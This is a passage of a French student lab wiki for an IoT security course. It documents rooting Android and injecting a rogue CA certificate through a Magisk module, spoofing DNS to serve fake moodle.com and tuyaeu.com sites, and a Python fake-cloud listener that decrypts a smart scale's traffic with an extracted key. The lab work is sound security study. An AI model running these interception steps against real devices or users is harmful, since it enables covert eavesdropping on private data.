== Seconde tentative ==

qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw

qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw -cdrom *android-x86*.iso -boot d

qemu-system-x86_64 -m 2048 -enable-kvm -cpu host -smp 2 -display sdl -drive file=android.img,format=raw,if=virtio -usb -device usb-host,vendorid=0x148f,productid=0x5370

== Ultime tentative ==
Cette fois ci j'utilise l'application Android Studio qui permet d'émuler des téléphones Android pour le débogage d'application. On va donc s'en servir pour créer un Android routé qui va recevoir notre certificat.

Dans un premier temps j'ai donc routé mon téléphone avec l'utilitaire Magisik en suivant ce tutoriel : https://www.youtube.com/watch?v=QzsNn3GhYYk&t=374s.

Puis je viens ajouter un module dans Magisk qui permet de recharger à chaque demarrage du téléphone le certificat en question.

Le certificat peut être ajouter dans le téléphone en utilisant la commande <code>adb push xyzxyzxyz.0</code> .

La manipulation est la suivante :<syntaxhighlight lang="linux-config">
adb shell
su
cd /data/adb/modules/
mkdir -p tuya_cert/system/etc/security/cacerts
echo "id=tuya_cert" > tuya_cert/module.prop echo "name=Tuya Certificate Injection" >> tuya_cert/module.prop echo "version=1.0" >> tuya_cert/module.prop echo "versionCode=1" >> tuya_cert/module.prop echo "author=Victo" >> tuya_cert/module.prop echo "description=Injecte le certificat Tuya dans le systeme" >> tuya_cert/module.prop
touch tuya_cert/auto_mount
cp /sdcard/Download/26e33623.0 /data/adb/modules/tuya_cert/system/etc/security/cacerts/
chmod 644 /data/adb/modules/tuya_cert/system/etc/security/cacerts/26e33623.0
chown root:root /data/adb/modules/tuya_cert/system/etc/security/cacerts/26e33623.0
reboot
</syntaxhighlight>

= Machine <code>android</code> (06/10) =
Pour cette dernière partie, j'ai retrouvé une tablette sous <code>Android 4.4 KitKat</code> qui permet d'ajouter des autorités de certification.

C'est donc ce que j'ai fait :

[[Fichier:Photo_certifiable.png|sans_cadre]]

Maintenant, on constate en se connectant sur moodle.com à partir de cette tablette que l'on est bien redirigé vers le faux site et qu'il est sécurisé avec le magnifique cadenas vert.

[[Fichier:Photo moodle.png|sans_cadre]]

(cette page web date du 06/10/25, elle n'est plus valable depuis le 10/10/25...)

= Nedis Wi-Fi Smart Personal Scales =

Dans ce second TP, nous allons jouer avec ce pèse personne de nedis.

Dans un premier temps, j'ai connecté la balance au réseau SE5-SSID10.

Puis j'ai remarqué que quand je tentais de me peser, la balance affichait err2.

Après une courte investigation, il s'agit d'une balance qui émet des signaux électriques pour analyser la composition corporelle donc si on se pèse avec des chaussures, cela pose problème.

Pour la suite du projet, on se pèsera avec les mains.

[[Fichier:Poid_sur_app_nedis.png|sans_cadre]]

On constate sur ces paquets la requête de la balance pour obtenir une IP, puis le moment ou elle l'obtient.

[[Fichier:WS connection balance.png|sans_cadre|858x858px]]

Je peux donc ping ma balance depuis mon pc (celui qui host ma VM android)

[[Fichier:PIng balance.png|sans_cadre]]

<code>tcpdump -i eth1 -n port 53</code> :<syntaxhighlight lang="linux-config">
14:46:51.115996 IP 172.16.10.105.49153 > 172.16.10.1.53: 13861+ A? m2.tuyaeu.com. (31)
14:46:51.125611 IP 172.16.10.1.53 > 172.16.10.105.49153: 13861 3/0/0 A 3.120.92.134, A 18.184.31.90, A 35.156.44.172 (79)
14:46:51.168250 IP 172.16.10.105.49153 > 172.16.10.1.53: 59035+ A? a3.tuyaeu.com. (31)
14:46:51.177967 IP 172.16.10.1.53 > 172.16.10.105.49153: 59035 3/0/0 A 18.198.62.99, A 18.158.227.228, A 3.67.116.46 (79)
14:46:51.703179 IP 172.16.10.102.57661 > 172.16.10.1.53: 30982+ AAAA? a1.tuyaeu.com. (31)
14:46:51.706085 IP 172.16.10.102.57662 > 172.16.10.1.53: 15654+ A? a1.tuyaeu.com. (31)
14:46:51.713159 IP 172.16.10.1.53 > 172.16.10.102.57661: 30982 3/0/0 AAAA 2a05:d014:afa:af02:262a:be09:e328:ff21, AAAA 2a05:d014:afa:af01:87dc:dc67:35a1:5bfe, AAAA 2a05:d014:afa:af00:1ee2:1f00:e061:e8bf (115)
14:46:51.715736 IP 172.16.10.1.53 > 172.16.10.102.57662: 15654 3/0/0 A 3.78.92.3, A 35.159.150.3, A 3.121.33.91 (79)

56 packets captured
56 packets received by filter
0 packets dropped by kernel
[4343449.827028] device eth1 left promiscuous mode

</syntaxhighlight>visiblement notre balance communique avec tuya via m2.tuyaeu.com et a3.tuyaeu.com. Par la suite on constate qu'elle communique avec une multitude de XY.tuyaeu.com.

Maintenant on refait une config similaire à moodle.com, une zone "tuyaeu.com" dans le fichier de conf de bind, un fichier db.tuyaeu.com et une page apache. Enfin on vient la signer avec notre autorité de certification.

<code>tcpdump -i eth1 -n port 53</code> :<syntaxhighlight lang="linux-config">
root@SE5:/etc/apache2/sites-available# tcpdump -i eth1 -n port 53
[5544865.540418] device eth1 entered promiscuous mode
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth1, link-type EN10MB (Ethernet), snapshot length 262144 bytes
12:30:55.146437 IP 172.16.10.1.53 > 172.16.10.100.17620: 23156 5/0/0 CNAME reddit.map.fastly.net., A 151.101.129.140, A
151.101.1.140, A 151.101.65.140, A 151.101.193.140 (129)
12:30:55.168796 IP 172.16.10.1.53 > 172.16.10.100.24249: 64622 2/0/0 CNAME us-central1-gcp.api.sc-gw.com., A 35.190.43.
134 (109)
12:30:55.322498 IP 172.16.10.100.26394 > 172.16.10.1.53: 29420+ A? scontent-cdg4-1.xx.fbcdn.net. (46)
12:30:56.095075 IP 172.16.10.100.62675 > 172.16.10.1.53: 46396+ A? cf-st.sc-cdn.net. (34)
12:30:56.121796 IP 172.16.10.1.53 > 172.16.10.100.62675: 46396 1/0/0 A 3.163.248.4 (50)
12:30:56.539099 IP 172.16.10.1.53 > 172.16.10.100.26394: 29420 1/0/0 A 185.60.219.2 (62)
12:30:57.289763 IP 172.16.10.100.7071 > 172.16.10.1.53: 14247+ A? usc1-gcp-v62.api.snapchat.com. (47)
12:30:57.302767 IP 172.16.10.1.53 > 172.16.10.100.7071: 14247 2/0/0 CNAME usc1-gcp-v62.api.sc-gw.com., A 34.120.159.232
(103)
12:30:58.490060 IP 172.16.10.105.49153 > 172.16.10.1.53: 50294+ A? m2.tuyaeu.com. (31)
12:30:58.490174 IP 172.16.10.1.53 > 172.16.10.105.49153: 50294* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)
12:30:58.540041 IP 172.16.10.105.49153 > 172.16.10.1.53: 23785+ A? a3.tuyaeu.com. (31)
12:30:58.540132 IP 172.16.10.1.53 > 172.16.10.105.49153: 23785* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)
12:31:00.979103 IP 172.16.10.100.63625 > 172.16.10.1.53: 63574+ A? gql-fed.reddit.com. (36)
12:31:00.997721 IP 172.16.10.1.53 > 172.16.10.100.63625: 63574 5/0/0 CNAME reddit.map.fastly.net., A 151.101.65.140, A
151.101.129.140, A 151.101.193.140, A 151.101.1.140 (135)
12:31:04.461507 IP 172.16.10.102.63971 > 172.16.10.1.53: 20792+ A? discord.com. (29)
12:31:04.461519 IP 172.16.10.102.54572 > 172.16.10.1.53: 15444+ Type65? discord.com. (29)
12:31:04.493098 IP 172.16.10.1.53 > 172.16.10.102.63971: 20792 5/0/0 A 162.159.138.232, A 162.159.136.232, A 162.159.12
8.233, A 162.159.135.232, A 162.159.137.232 (109)
12:31:04.493306 IP 172.16.10.1.53 > 172.16.10.102.54572: 15444 1/0/5 Type65 (158)
18 packets captured
18 packets received by filter
0 packets dropped by kernel

</syntaxhighlight>tcpdump -i eth1 host 172.16.10.105 and not port 53 -A<syntaxhighlight lang="linux-config">
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth1, link-type EN10MB (Ethernet), snapshot length 262144 bytes
12:36:41.148741 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4......<\)...........
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....X..........
.....
.. plil.info................
12:36:41.161323 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4g.....[.}T..........
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....X..........
.....
.. plil.info................
12:36:41.167616 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
i....P....Y...c....
12:36:41.490919 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
i.r.u....).........
12:36:41.993612 ARP, Request who-has 172.16.10.105 tell 172.16.10.105, length 46
..........|.-L..
i........
i..HE.....f........
12:36:42.011664 ARP, Request who-has 172.16.10.1 tell 172.16.10.105, length 46
..........|.-L..
i........
.....up. ..........
12:36:42.011672 ARP, Reply 172.16.10.1 is-at 00:16:3e:23:74:42 (oui Unknown), length 28
..........>#tB..
...|.-L..
i
12:36:42.019053 IP 172.16.10.105.3872 > 172.16.10.1.8886: Flags [S], seq 6509, win 4380, options [mss 1460], length 0
E..,......O>..
i..
.. "....m....`....<........
12:36:42.019100 IP 172.16.10.1.8886 > 172.16.10.105.3872: Flags [R.], seq 0, ack 6510, win 0, length 0
E..(..@.@..E..
...
i".. .......nP.......
12:36:42.070419 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [S], seq 6509, win 4380, options [mss 1460], length 0
E..,......O<..
i..
.B......m....`...........<.
12:36:42.070442 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [S.], seq 3767910189, ack 6510, win 64240, options [m
ss 1460], length 0
E..,..@.@..A..
...
i..B....-...n`...l.......
12:36:42.077437 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [.], ack 1, win 4380, length 0
E..(......O?..
i..
.B......n....P...4......
..
12:36:42.079986 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [P.], seq 1:68, ack 1, win 4380, length 67
E..k......N...
i..
.B......n....P...........>...:..BAohBAohbmd6aG91IFR1eVjaG5vbG9SB........................
12:36:42.080012 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [.], ack 68, win 64173, length 0
E..(..@.@.....
...
i..B.........P...l...
12:36:42.080447 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [P.], seq 1:8, ack 68, win 64173, length 7
E../..@.@.....
...
i..B.........P...l.........(
12:36:42.080533 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [F.], seq 8, ack 68, win 64173, length 0
E..(..@.@.....
...
i..B....5....P...l...
12:36:42.101652 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [.], ack 8, win 4373, length 0
E..(. ....O<..
i..
.B..........5P...4s........
12:36:42.102116 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [R.], seq 68, ack 8, win 4380, length 0
E..(.
....O;..
i..
.B..........5P...4h.....
..
12:36:43.025368 IP 172.16.10.105.23869 > 172.16.10.1.8886: Flags [S], seq 6511, win 4380, options [mss 1460], length 0
E..,......O6..
i..
.]="....o....`............9
12:36:43.025387 IP 172.16.10.1.8886 > 172.16.10.105.23869: Flags [R.], seq 0, ack 6512, win 0, length 0
E..(..@.@..E..
...
i".]=.......pP.......
12:36:44.025225 IP 172.16.10.105.22317 > 172.16.10.1.8886: Flags [S], seq 6513, win 4380, options [mss 1460], length 0
E..,......O5..
i..
.W-"....q....`....+........
12:36:44.025269 IP 172.16.10.1.8886 > 172.16.10.105.22317: Flags [R.], seq 0, ack 6514, win 0, length 0
E..(..@.@..E..
...
i".W-.......rP.......
12:36:45.025301 IP 172.16.10.105.31465 > 172.16.10.1.8886: Flags [S], seq 6517, win 4380, options [mss 1460], length 0
E..,......O4..
i..
.z."....u....`...ck......E.
12:36:45.025318 IP 172.16.10.1.8886 > 172.16.10.105.31465: Flags [R.], seq 0, ack 6518, win 0, length 0
E..(..@.@..E..
...
i".z........vP....0..
12:36:46.025500 IP 172.16.10.105.9070 > 172.16.10.1.8886: Flags [S], seq 6521, win 4380, options [mss 1460], length 0
E..,......O3..
i..
.#n"....y....`.............
12:36:46.025517 IP 172.16.10.1.8886 > 172.16.10.105.9070: Flags [R.], seq 0, ack 6522, win 0, length 0
E..(..@.@..E..
...
i".#n.......zP.......
12:36:47.033189 IP 172.16.10.105.51179 > 172.16.10.1.8886: Flags [S], seq 6527, win 4380, options [mss 1460], length 0
E..,......O2..
i..
...".........`...._......y.
12:36:47.033206 IP 172.16.10.1.8886 > 172.16.10.105.51179: Flags [R.], seq 0, ack 6528, win 0, length 0
E..(..@.@..E..
...
i"...........P...?$..
12:36:47.263020 ARP, Request who-has 172.16.10.105 tell 172.16.10.1, length 28
..........>#tB..
.........
i
12:36:48.287049 ARP, Request who-has 172.16.10.105 tell 172.16.10.1, length 28
..........>#tB..
.........
i
12:36:48.653641 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4B...................
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....Q..........
.....
.. plil.info................
12:36:48.663352 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4.L.......p..........
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....Q..........
.....
.. plil.info................
12:36:48.674677 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
i>#tB./..P.........
12:36:48.993649 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
ir...P.............
12:36:49.311055 ARP, Request who-has 172.16.10.105 tell 172.16.10.1, length 28
..........>#tB..
.........
i
12:36:49.490922 ARP, Request who-has 172.16.10.105 tell 172.16.10.105, length 46
..........|.-L..
i........
i.......x....D.....
12:36:49.492262 ARP, Reply 172.16.10.105 is-at a4:e5:7c:16:2d:4c (oui Unknown), length 46
..........|.-L..
i..>#tB..
...................
12:36:49.515651 IP 172.16.10.105.29415 > 172.16.10.1.8886: Flags [S], seq 6536, win 4380, options [mss 1460], length 0
E..,......O...
i..
.r.".........`...kZ........
12:36:49.515669 IP 172.16.10.1.8886 > 172.16.10.105.29415: Flags [R.], seq 0, ack 6537, win 0, length 0
E..(..@.@..E..
...
i".r.........P.......
12:36:49.518628 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [S], seq 6539, win 4380, options [mss 1460], length 0
E..,......O-..
i..
.z]..........`.............
12:36:49.518648 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [S.], seq 1378912894, ack 6540, win 64240, options [m
ss 1460], length 0
E..,..@.@..A..
...
i..z]R0.~....`...l.......
12:36:49.523505 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [.], ack 1, win 4380, length 0
E..(......O0..
i..
.z]......R0..P........a3.tu
12:36:49.527055 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [P.], seq 1:68, ack 1, win 4380, length 67
E..k......N...
i..
.z]......R0..P...G?......>...:..BAohBAohbmd6aG91IFR1eVjaG5vbG9SB........................
12:36:49.527081 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [.], ack 68, win 64173, length 0
E..(..@.@..X..
...
i..z]R0......P...l...
12:36:49.527462 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [P.], seq 1:8, ack 68, win 64173, length 7
E../..@.@..P..
...
i..z]R0......P...l.........(
12:36:49.527530 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [F.], seq 8, ack 68, win 64173, length 0
E..(..@.@..V..
...
i..z]R0......P...l...
12:36:49.569636 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [.], ack 8, win 4373, length 0
E..(......O...
i..
.z]......R0..P..........C.@
12:36:49.574893 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [R.], seq 68, ack 8, win 4380, length 0
E..(......O-..
i..
.z]......R0..P..........
..
12:36:50.310055 ARP, Request who-has 172.16.10.105 tell 172.16.10.105, length 46
..........|.-L..
i........
i........ ....>....
12:36:53.526624 IP 172.16.10.105.48314 > 172.16.10.1.8886: Flags [S], seq 6547, win 4380, options [mss 1460], length 0
E..,......O&..
i..
...".........`...!|........
12:36:53.526669 IP 172.16.10.1.8886 > 172.16.10.105.48314: Flags [R.], seq 0, ack 6548, win 0, length 0
E..(..@.@..E..
...
i"...........P...JA..
12:36:54.536817 IP 172.16.10.105.44185 > 172.16.10.1.8886: Flags [S], seq 6567, win 4380, options [mss 1460], length 0
E..,......O%..
i..
...".........`...1.........
12:36:54.536835 IP 172.16.10.1.8886 > 172.16.10.105.44185: Flags [R.], seq 0, ack 6568, win 0, length 0
E..(..@.@..E..
...
i"...........P...ZN..
12:36:55.545631 IP 172.16.10.105.26626 > 172.16.10.1.8886: Flags [S], seq 6589, win 4380, options [mss 1460], length 0
E..,......O$..
i..
.h.".........`...v
........
12:36:55.545649 IP 172.16.10.1.8886 > 172.16.10.105.26626: Flags [R.], seq 0, ack 6590, win 0, length 0
E..(..@.@..E..
...
i".h.........P.......
12:36:56.554680 IP 172.16.10.105.16244 > 172.16.10.1.8886: Flags [S], seq 6611, win 4380, options [mss 1460], length 0
E..,......O#..
i..
.?t".........`.............
12:36:56.554698 IP 172.16.10.1.8886 > 172.16.10.105.16244: Flags [R.], seq 0, ack 6612, win 0, length 0
E..(..@.@..E..
...
i".?t........P....G..
^C
57 packets captured
57 packets received by filter
0 packets dropped by kernel
</syntaxhighlight>port 8886 chez tuya ?

<syntaxhighlight lang="linux-config">
root@SE5:/etc/apache2/sites-available# openssl s_server -accept 8886 -cert /etc/ssl/apache/ca.crt -key /etc/ssl/apache/ca.key -debug
Using default temp DH parameters
ACCEPT
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c1930 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c1930 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c1930 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 00 00 00 00 d6aG91IFR1eV....
0020 - 00 00 00 00 00 00 00 00-04 00 ae 00 ff 01 00 00 ................
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 00 ...:..BAohBAohb.
0010 - 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
0020 - 00 00 00 00 00 00 00 00-04 00 ae 00 ff 01 00 00 ................
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c1930 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c1930 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c1930 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 00 00 00 00-00 00 00 00 00 00 00 00 d6aG............
0020 - 00 00 00 00 00 00 00 00-04 00 ae 00 ff 01 00 00 ................
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c1930 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c1930 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c1930 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
</syntaxhighlight>trouver un mdp dans l'appli nedis /data/data/com.nedis.smartlife/shared_prefs

decouverte de tinytuya : https://github.com/jasonacox/tinytuya<syntaxhighlight lang="python3">
import socket
import tinytuya
import json

LOCAL_KEY = '674d29fb978a1705'

IP_BALANCE = '172.16.10.105'

print(f"[*] Démarrage du Faux Cloud Tuya...")
print(f"[*] Clé utilisée : {LOCAL_KEY}")

server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind(('0.0.0.0', 8886))
server_socket.listen(1)

print("[*] En attente de la balance sur le port 8886...")
print("[*] Monte sur la balance maintenant !")

while True:
try:
client, addr = server_socket.accept()
print(f"\n[+] Connexion reçue de {addr[0]} !")

data = client.recv(4096)

if data:
print(f"[i] {len(data)} octets reçus (chiffrés). Tentative de décodage...")

try:
d = tinytuya.OutletDevice('DUMMY_ID', IP_BALANCE, LOCAL_KEY)
d.set_version(3.3) # Version standard WiFi

decrypted = d._decode_payload(data)

if decrypted:
print("\n" + "="*40)
print("donnés :")
print("="*40)
parsed = json.loads(decrypted)
print(json.dumps(parsed, indent=4))

if 'dps' in parsed:
print("\nVALEURS :")
for k, v in parsed['dps'].items():
print(f"- Data Point {k} : {v}")
print("="*40)
else:
print("[-] Échec du décryptage (Format inconnu ou clé incorrecte pour ce paquet)")

except Exception as e:
print(f"[-] Erreur de décodage : {e}")

client.close()

except KeyboardInterrupt:
print("\nArrêt.")
break
except Exception as e:
print(f"Erreur serveur : {e}")
</syntaxhighlight>

SE5 IdO sécurité des objets 2025/2026 b1

2025-12-04T15:02:11Z

Vdetrez : /* Interception de flux (30/09) */

[[Fichier:1107px-Titre page.png|sans_cadre|820x820px]]

= Serveur virtuel (17/09) =
Dans un premier temps, on vient créer un serveur virtuel sur <code>capbreton</code> avec la commande <code>xen-create-image --hostname=SE5.vdetrez --dhcp --dir=/usr/local/xen --size=10G --memory=2G --dist=daedalus --bridge=bridgeStudents</code>

Ensuite, sur capbreton dans le dossier <code>/etc/network/interfaces.d</code> on vient créer un fichier <code>g1_vdetrez</code> pour mettre en place une nouvelle interface dans le VLAN 410. <syntaxhighlight lang="linux-config">
auto Trunk.410
iface Trunk.410 inet manual
vlan-raw-device Trunk
up ip link set $IFACE up
down ip link set $IFACE down

auto g1_vdetrez
iface g1_vdetrez inet manual
bridge_ports Trunk.410
up ip link set $IFACE up
down ip link set $IFACE down

</syntaxhighlight>

On a maintenant accès à la machine SE5.vdetrez (en ayant évidemment fait l'erreur de mettre "." à la place de "-") et on vient y configurer nos adresses IPv4.

Mon adresse IPv4 routée est la <code>172.26.145.100</code> et mon IPv4 dans le VLAN 410 est <code>172.16.10.0</code> <syntaxhighlight lang="linux-config">
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
address 172.26.145.110
netmask 255.255.255.0
gateway 172.26.145.251
# post-up ethtool -K eth0 tx off

auto eth1
iface eth1 inet static
address 172.16.10.0/24
#
# The commented out line above will disable TCP checksumming which
# might resolve problems for some users. It is disabled by default
#

</syntaxhighlight>

On vérifie avec la commande <code>ip a</code><syntaxhighlight lang="linux-config">
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:41 brd ff:ff:ff:ff:ff:ff
inet 172.26.145.110/24 brd 172.26.145.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 2001:660:4401:6050:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 853sec preferred_lft 753sec
inet6 2a01:c916:2047:c850:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 2591853sec preferred_lft 604653sec
